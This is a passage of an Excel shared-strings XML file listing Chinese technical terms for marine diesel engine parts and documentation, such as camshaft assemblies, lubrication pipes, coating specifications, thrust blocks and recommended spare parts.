        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮箱体管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴，粗加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴，后端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴，前端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴保护罩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴部件校中生产建议</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴承钢索滑轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴承液压拉伸器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴齿轮</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴齿轮（凸轮轴驱动）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴齿轮齿圈（凸轮轴驱动）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴齿轮轮毂（凸轮轴驱动）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴冲击搬手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴出口主管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴单元布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴导向工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴的凸轮检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴的轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴吊具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴防护罩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴和凸轮轴驱动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴滑油出口管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴滑油出口主管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴滑油单元的管路系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴滑油单元的配置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴滑油单元的外形</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴滑油进口管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴滑油支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴滑油主管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴加工数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴架后端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴架前端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴壳体盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴壳体和基座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴壳体外形</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位置公差</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴控制图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴连接，液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴驱动机构箱体</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>CAMSHAFT DRIVING GEAR ASSEMBLY 1/2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>～</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2/2</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴驱动机构装配</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴润滑油系统冲洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴上的链轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴瓦检查和更换</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴箱放泄管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴校中</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴正时图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴轴承安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴轴承保养程序</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴轴承衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴轴承吊具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴轴承盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴轴承螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴轴承数据</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴装配</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴总成工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸缘销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>图标</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>图表</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>间歇润滑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>图例盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>图像恢复工具</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>图纸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涂层程序</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涂层处理工艺</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涂层规范</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涂层规格书</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推动器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推荐紧固扭矩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推荐易损件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> 12000</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推荐易损件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> 16000</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推荐易损件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> 20000</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推荐易损件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> 24000</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推荐易损件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> 28000</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推荐易损件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> 32000</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推荐易损件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> 4000H</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推荐易损件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> 8000H</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推进负荷曲线</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推进机械装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推进器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推进装置控制</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导套轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力底脚</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力垫片锁环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力阀杆研磨杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力环上部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力环下部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力环总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力块</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力块，螺塞阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力块，摇臂</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
